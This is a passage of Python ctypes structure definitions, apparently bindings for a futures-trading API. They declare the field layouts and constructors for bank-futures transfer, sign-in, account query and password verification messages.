if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if InstallID:
self.InstallID = InstallID
if UserID:
self.UserID = UserID.encode("GBK")
if Digest:
self.Digest = Digest.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if RequestID:
self.RequestID = RequestID
if TID:
self.TID = TID
class RspFutureSignOut(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("InstallID", c_int),
("UserID", c_char_Array_16),
("Digest", c_char_Array_36),
("CurrencyID", c_char_Array_4),
("DeviceID", c_char_Array_3),
("BrokerIDByBank", c_char_Array_33),
("OperNo", c_char_Array_17),
("RequestID", c_int),
("TID", c_int),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, InstallID=None, UserID=None, Digest=None, CurrencyID=None, DeviceID=None, BrokerIDByBank=None, OperNo=None, RequestID=None, TID=None, ErrorID=None, ErrorMsg=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if InstallID:
self.InstallID = InstallID
if UserID:
self.UserID = UserID.encode("GBK")
if Digest:
self.Digest = Digest.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if RequestID:
self.RequestID = RequestID
if TID:
self.TID = TID
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
class ReqQueryTradeResultBySerial(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("Reference", c_int),
("RefrenceIssureType", c_char),
("RefrenceIssure", c_char_Array_36),
("CustomerName", c_char_Array_51),
("IdCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("CustType", c_char),
("BankAccount", c_char_Array_41),
("BankPassWord", c_char_Array_41),
("AccountID", c_char_Array_13),
("Password", c_char_Array_41),
("CurrencyID", c_char_Array_4),
("TradeAmount", c_double),
("Digest", c_char_Array_36),
("LongCustomerName", c_char_Array_161),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, Reference=None, RefrenceIssureType=None, RefrenceIssure=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, CustType=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, CurrencyID=None, TradeAmount=None, Digest=None, LongCustomerName=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if Reference:
self.Reference = Reference
if RefrenceIssureType:
self.RefrenceIssureType = RefrenceIssureType.encode("GBK")
if RefrenceIssure:
self.RefrenceIssure = RefrenceIssure.encode("GBK")
if CustomerName:
self.CustomerName = CustomerName.encode("GBK")
if IdCardType:
self.IdCardType = IdCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if CustType:
self.CustType = CustType.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if BankPassWord:
self.BankPassWord = BankPassWord.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if TradeAmount:
self.TradeAmount = TradeAmount
if Digest:
self.Digest = Digest.encode("GBK")
if LongCustomerName:
self.LongCustomerName = LongCustomerName.encode("GBK")
class RspQueryTradeResultBySerial(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
("Reference", c_int),
("RefrenceIssureType", c_char),
("RefrenceIssure", c_char_Array_36),
("OriginReturnCode", c_char_Array_7),
("OriginDescrInfoForReturnCode", c_char_Array_129),
("BankAccount", c_char_Array_41),
("BankPassWord", c_char_Array_41),
("AccountID", c_char_Array_13),
("Password", c_char_Array_41),
("CurrencyID", c_char_Array_4),
("TradeAmount", c_double),
("Digest", c_char_Array_36),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, ErrorID=None, ErrorMsg=None, Reference=None, RefrenceIssureType=None, RefrenceIssure=None, OriginReturnCode=None, OriginDescrInfoForReturnCode=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, CurrencyID=None, TradeAmount=None, Digest=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
if Reference:
self.Reference = Reference
if RefrenceIssureType:
self.RefrenceIssureType = RefrenceIssureType.encode("GBK")
if RefrenceIssure:
self.RefrenceIssure = RefrenceIssure.encode("GBK")
if OriginReturnCode:
self.OriginReturnCode = OriginReturnCode.encode("GBK")
if OriginDescrInfoForReturnCode:
self.OriginDescrInfoForReturnCode = OriginDescrInfoForReturnCode.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if BankPassWord:
self.BankPassWord = BankPassWord.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if TradeAmount:
self.TradeAmount = TradeAmount
if Digest:
self.Digest = Digest.encode("GBK")
class ReqDayEndFileReady(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("FileBusinessCode", c_char),
("Digest", c_char_Array_36),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, FileBusinessCode=None, Digest=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if FileBusinessCode:
self.FileBusinessCode = FileBusinessCode.encode("GBK")
if Digest:
self.Digest = Digest.encode("GBK")
class ReturnResult(Struct):
_fields_ = [
("ReturnCode", c_char_Array_7),
("DescrInfoForReturnCode", c_char_Array_129),
]
def __init__(self, ReturnCode=None, DescrInfoForReturnCode=None):
super().__init__()
if ReturnCode:
self.ReturnCode = ReturnCode.encode("GBK")
if DescrInfoForReturnCode:
self.DescrInfoForReturnCode = DescrInfoForReturnCode.encode("GBK")
class VerifyFuturePassword(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("AccountID", c_char_Array_13),
("Password", c_char_Array_41),
("BankAccount", c_char_Array_41),
("BankPassWord", c_char_Array_41),
("InstallID", c_int),
("TID", c_int),
("CurrencyID", c_char_Array_4),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, AccountID=None, Password=None, BankAccount=None, BankPassWord=None, InstallID=None, TID=None, CurrencyID=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if BankPassWord:
self.BankPassWord = BankPassWord.encode("GBK")
if InstallID:
self.InstallID = InstallID
if TID:
self.TID = TID
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
class VerifyCustInfo(Struct):
_fields_ = [
("CustomerName", c_char_Array_51),
("IdCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("CustType", c_char),
("LongCustomerName", c_char_Array_161),
]
def __init__(self, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, CustType=None, LongCustomerName=None):
super().__init__()
if CustomerName:
self.CustomerName = CustomerName.encode("GBK")
if IdCardType:
self.IdCardType = IdCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if CustType:
self.CustType = CustType.encode("GBK")
if LongCustomerName:
self.LongCustomerName = LongCustomerName.encode("GBK")
class VerifyFuturePasswordAndCustInfo(Struct):
_fields_ = [
("CustomerName", c_char_Array_51),
("IdCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("CustType", c_char),
("AccountID", c_char_Array_13),
("Password", c_char_Array_41),
("CurrencyID", c_char_Array_4),
("LongCustomerName", c_char_Array_161),
]
def __init__(self, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, CustType=None, AccountID=None, Password=None, CurrencyID=None, LongCustomerName=None):
super().__init__()
if CustomerName:
self.CustomerName = CustomerName.encode("GBK")
if IdCardType:
self.IdCardType = IdCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if CustType:
self.CustType = CustType.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if LongCustomerName:
self.LongCustomerName = LongCustomerName.encode("GBK")
class DepositResultInform(Struct):
_fields_ = [
("DepositSeqNo", c_char_Array_15),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("Deposit", c_double),
("RequestID", c_int),
("ReturnCode", c_char_Array_7),
("DescrInfoForReturnCode", c_char_Array_129),
]
def __init__(self, DepositSeqNo=None, BrokerID=None, InvestorID=None, Deposit=None, RequestID=None, ReturnCode=None, DescrInfoForReturnCode=None):
super().__init__()
if DepositSeqNo:
self.DepositSeqNo = DepositSeqNo.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if Deposit:
self.Deposit = Deposit
if RequestID:
self.RequestID = RequestID
if ReturnCode:
self.ReturnCode = ReturnCode.encode("GBK")
if DescrInfoForReturnCode:
self.DescrInfoForReturnCode = DescrInfoForReturnCode.encode("GBK")
class ReqSyncKey(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("InstallID", c_int),
("UserID", c_char_Array_16),
("Message", c_char_Array_129),
("DeviceID", c_char_Array_3),
("BrokerIDByBank", c_char_Array_33),
("OperNo", c_char_Array_17),
("RequestID", c_int),
("TID", c_int),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, InstallID=None, UserID=None, Message=None, DeviceID=None, BrokerIDByBank=None, OperNo=None, RequestID=None, TID=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if InstallID:
self.InstallID = InstallID
if UserID:
self.UserID = UserID.encode("GBK")
if Message:
self.Message = Message.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if RequestID:
self.RequestID = RequestID
if TID:
self.TID = TID
class RspSyncKey(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("InstallID", c_int),
("UserID", c_char_Array_16),
("Message", c_char_Array_129),
("DeviceID", c_char_Array_3),
("BrokerIDByBank", c_char_Array_33),
("OperNo", c_char_Array_17),
("RequestID", c_int),
("TID", c_int),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, InstallID=None, UserID=None, Message=None, DeviceID=None, BrokerIDByBank=None, OperNo=None, RequestID=None, TID=None, ErrorID=None, ErrorMsg=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if InstallID:
self.InstallID = InstallID
if UserID:
self.UserID = UserID.encode("GBK")
if Message:
self.Message = Message.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if RequestID:
self.RequestID = RequestID
if TID:
self.TID = TID
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
class NotifyQueryAccount(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("CustomerName", c_char_Array_51),
("IdCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("CustType", c_char),
("BankAccount", c_char_Array_41),
("BankPassWord", c_char_Array_41),
("AccountID", c_char_Array_13),
("Password", c_char_Array_41),
("FutureSerial", c_int),
("InstallID", c_int),
("UserID", c_char_Array_16),
("VerifyCertNoFlag", c_char),
("CurrencyID", c_char_Array_4),
("Digest", c_char_Array_36),
("BankAccType", c_char),
("DeviceID", c_char_Array_3),
("BankSecuAccType", c_char),
("BrokerIDByBank", c_char_Array_33),
("BankSecuAcc", c_char_Array_41),
("BankPwdFlag", c_char),
("SecuPwdFlag", c_char),
("OperNo", c_char_Array_17),
("RequestID", c_int),
("TID", c_int),
("BankUseAmount", c_double),
("BankFetchAmount", c_double),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
("LongCustomerName", c_char_Array_161),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, CustType=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, FutureSerial=None, InstallID=None, UserID=None, VerifyCertNoFlag=None, CurrencyID=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, RequestID=None, TID=None, BankUseAmount=None, BankFetchAmount=None, ErrorID=None, ErrorMsg=None, LongCustomerName=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if CustomerName:
self.CustomerName = CustomerName.encode("GBK")
if IdCardType:
self.IdCardType = IdCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if CustType:
self.CustType = CustType.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if BankPassWord:
self.BankPassWord = BankPassWord.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if FutureSerial:
self.FutureSerial = FutureSerial
if InstallID:
self.InstallID = InstallID
if UserID:
self.UserID = UserID.encode("GBK")
if VerifyCertNoFlag:
self.VerifyCertNoFlag = VerifyCertNoFlag.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if Digest:
self.Digest = Digest.encode("GBK")
if BankAccType:
self.BankAccType = BankAccType.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if BankSecuAccType:
self.BankSecuAccType = BankSecuAccType.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if BankSecuAcc:
self.BankSecuAcc = BankSecuAcc.encode("GBK")
if BankPwdFlag:
self.BankPwdFlag = BankPwdFlag.encode("GBK")
if SecuPwdFlag:
self.SecuPwdFlag = SecuPwdFlag.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if RequestID:
self.RequestID = RequestID
if TID:
self.TID = TID
if BankUseAmount:
self.BankUseAmount = BankUseAmount
if BankFetchAmount:
self.BankFetchAmount = BankFetchAmount
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
if LongCustomerName:
self.LongCustomerName = LongCustomerName.encode("GBK")
class TransferSerial(Struct):
_fields_ = [
("PlateSerial", c_int),
("TradeDate", c_char_Array_9),
("TradingDay", c_char_Array_9),
("TradeTime", c_char_Array_9),
("TradeCode", c_char_Array_7),
("SessionID", c_int),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BankAccType", c_char),
("BankAccount", c_char_Array_41),
("BankSerial", c_char_Array_13),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("FutureAccType", c_char),
("AccountID", c_char_Array_13),
("InvestorID", c_char_Array_13),
("FutureSerial", c_int),
("IdCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("CurrencyID", c_char_Array_4),
("TradeAmount", c_double),
("CustFee", c_double),
("BrokerFee", c_double),
("AvailabilityFlag", c_char),
("OperatorCode", c_char_Array_17),
("BankNewAccount", c_char_Array_41),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
]
def __init__(self, PlateSerial=None, TradeDate=None, TradingDay=None, TradeTime=None, TradeCode=None, SessionID=None, BankID=None, BankBranchID=None, BankAccType=None, BankAccount=None, BankSerial=None, BrokerID=None, BrokerBranchID=None, FutureAccType=None, AccountID=None, InvestorID=None, FutureSerial=None, IdCardType=None, IdentifiedCardNo=None, CurrencyID=None, TradeAmount=None, CustFee=None, BrokerFee=None, AvailabilityFlag=None, OperatorCode=None, BankNewAccount=None, ErrorID=None, ErrorMsg=None):
super().__init__()
if PlateSerial:
self.PlateSerial = PlateSerial
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if SessionID:
self.SessionID = SessionID
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BankAccType:
self.BankAccType = BankAccType.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if FutureAccType:
self.FutureAccType = FutureAccType.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if FutureSerial:
self.FutureSerial = FutureSerial
if IdCardType:
self.IdCardType = IdCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if TradeAmount:
self.TradeAmount = TradeAmount
if CustFee:
self.CustFee = CustFee
if BrokerFee:
self.BrokerFee = BrokerFee
if AvailabilityFlag:
self.AvailabilityFlag = AvailabilityFlag.encode("GBK")
if OperatorCode:
self.OperatorCode = OperatorCode.encode("GBK")
if BankNewAccount:
self.BankNewAccount = BankNewAccount.encode("GBK")
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
class QryTransferSerial(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("AccountID", c_char_Array_13),
("BankID", c_char_Array_4),
("CurrencyID", c_char_Array_4),
]
def __init__(self, BrokerID=None, AccountID=None, BankID=None, CurrencyID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
class NotifyFutureSignIn(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("InstallID", c_int),
("UserID", c_char_Array_16),
("Digest", c_char_Array_36),
("CurrencyID", c_char_Array_4),
("DeviceID", c_char_Array_3),
("BrokerIDByBank", c_char_Array_33),
("OperNo", c_char_Array_17),
("RequestID", c_int),
("TID", c_int),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
("PinKey", c_char_Array_129),
("MacKey", c_char_Array_129),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, InstallID=None, UserID=None, Digest=None, CurrencyID=None, DeviceID=None, BrokerIDByBank=None, OperNo=None, RequestID=None, TID=None, ErrorID=None, ErrorMsg=None, PinKey=None, MacKey=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
